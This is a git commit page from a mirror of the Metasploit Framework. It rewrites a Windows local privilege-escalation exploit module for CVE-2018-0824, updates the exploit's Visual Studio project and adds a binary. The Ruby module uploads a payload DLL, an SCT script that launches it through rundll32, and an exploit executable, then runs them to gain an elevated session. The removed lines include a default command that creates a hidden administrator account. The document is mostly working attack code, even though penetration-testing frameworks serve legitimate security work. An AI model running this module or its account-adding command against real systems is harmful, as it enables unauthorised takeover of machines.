infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update stuff

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-10-17 17:17:05 -05:00
parent 629f4c190d
commit d2c013001d
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
3 changed files with 151 additions and 94 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2018-0824/UnmarshalPwn.exe
View File

Binary file not shown.

9
external/source/exploits/CVE-2018-0824/UnmarshalPwn.vcxproj vendored Normal file → Executable file
View File

@ -1,4 +1,4 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32"> <ProjectConfiguration Include="Debug|Win32">
@ -29,7 +29,7 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
@ -42,13 +42,13 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
@ -138,6 +138,7 @@
<SDLCheck>true</SDLCheck> <SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>

236
modules/exploits/windows/local/unmarshal.rb
View File

@ -2,10 +2,18 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File include Msf::Post::File
include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -30,105 +38,153 @@ class MetasploitModule < Msf::Exploit::Local
'DisclosureDate' => 'Aug 05 2018', 'DisclosureDate' => 'Aug 05 2018',
'Arch' => [ARCH_X64], 'Arch' => [ARCH_X64],
'SessionTypes' => ['meterpreter'], 'SessionTypes' => ['meterpreter'],
'License' => MSF_LICENSE 'Platform' => ['win'],
'Targets' =>
[
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'False'
}
)) ))
register_options( register_options(
[ [
OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']), OptString.new('EXPLOIT_NAME',
OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('SCRIPT_NAME',
[false, 'The filename to use for the COM script file (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload dll be used on the target host.', nil]),
OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
]) ])
end end
def write_poc_to_target(rpoc, rpocname) def setup
super
validate_active_host
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.dll" unless payload_name.match(/\.dll$/i)
@script_name = "#{script_name}.sct" unless payload_name.match(/\.sct$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
@exploit_path = "#{temp_path}\\#{exploit_name}"
@script_path = "#{temp_path}\\#{script_name}"
@payload_dll = generate_payload_dll
end
def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end
def validate_remote_path(path)
unless directory?(path)
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
end
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin begin
print_warning("writing to %TEMP%") file_rm(path)
temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname print_status("Deleted #{path}")
write_sct_to_target(temppoc,rpoc) rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end end
end
print_good("Persistent Script written to #{temppoc}")
temppoc
end
def write_sct_to_target(temppoc,rpoc)
fd = session.fs.file.new(temppoc, "w")
fd.write(rpoc)
fd.close
end end
def app_poc_on_target(append,rpocname) def upload_exploit
appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
fd = session.fs.file.new(appendpoc, "a") upload_file(exploit_path, local_exploit_path)
fd.write(append) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
fd.close
end
def create_sct_file(txt)
print_status("Reading Payload from file #{txt}")
::IO.read(txt)
end
def write_exe_to_target(rexe, rexename)
begin
print_warning("writing to %TEMP%")
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
write_file_to_target(temprexe,rexe)
end
print_good("Persistent Script written to #{temprexe}")
temprexe
end
def write_file_to_target(temprexe,rexe)
fd = session.fs.file.new(temprexe, "wb")
fd.write(rexe)
fd.close
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
::IO.read(exec)
end
def run
rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
print_status("exe name is: #{rexename}")
rpocname = Rex::Text.rand_text_alphanumeric(10) + ".sct"
print_status("poc name is: #{rpocname}")
poccmd = datastore['POCCMD']
cmdcheck = datastore['CMDCHECK']
rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
raw = create_payload_from_file rexe
script_on_target = write_exe_to_target(raw, rexename)
rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
rawsct = create_sct_file rpoc
poc_on_target = write_poc_to_target(rawsct, rpocname)
cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
fd = session.fs.file.new(cmdpoc, "a")
fd.write(poccmd)
fd.close
rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
append = create_payload_from_file rpoc1
append_on_target = app_poc_on_target(append, rpocname)
print_status('Starting module...')
print_line('')
command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
print_status("Location of UnmarshalPwn.exe is: #{command}")
command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
print_status("Location of poc.sct is: #{command1}")
command += " "
command += "#{command1}"
print_status("Executing command : #{command}")
command_output = cmd_exec(command)
print_line(command_output)
print_line('')
end end
def upload_payload
write_file(payload_path, payload_dll)
print_status("Payload (#{payload_dll.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end
def upload_script
vprint_status("Creating the sct file with payload #{payload_path}")
local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')
script_template_data = ::IO.read(local_script_template_path)
temp_path = payload_path
print_status("Payload path: #{temp_path}")
temp_path.gsub!('\\', '\\\\\\\\')
print_status("Payload path: #{temp_path}")
vprint_status("script_template_data.length = #{script_template_data.length}")
command = 'cmd.exe /c rundll32.exe ' + payload_path.gsub("\\", "\\\\\\\\") + ',0'
# script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
if script_data == nil
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
end
vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
write_file(script_path, script_data)
vprint_status('Script uploaded successfully')
end
def exploit
print_status("exploit path is: #{exploit_path}")
print_status("payload path is: #{payload_path}")
print_status("script path is: #{script_path}")
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_destination(exploit_path)
ensure_clean_destination(payload_path)
ensure_clean_destination(script_path)
vprint_status("Uploading Payload to #{payload_path}")
upload_payload
vprint_status("Uploading Script to #{script_path}")
upload_script
vprint_status("Uploading Exploit to #{exploit_path}")
upload_exploit
vprint_status('Launching Exploit...')
command_output = cmd_exec(exploit_path + ' ' + script_path)
vprint_status(command_output)
print_good('Exploit completed, wait for elevated session')
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_good('Exploit failed, cleaning up')
print_error(e.message)
ensure_clean_destination(exploit_path)
ensure_clean_destination(payload_path)
ensure_clean_destination(script_path)
end
end
attr_reader :exploit_name
attr_reader :payload_name
attr_reader :script_name
attr_reader :payload_dll
attr_reader :temp_path
attr_reader :exploit_path
attr_reader :payload_path
attr_reader :script_path
end end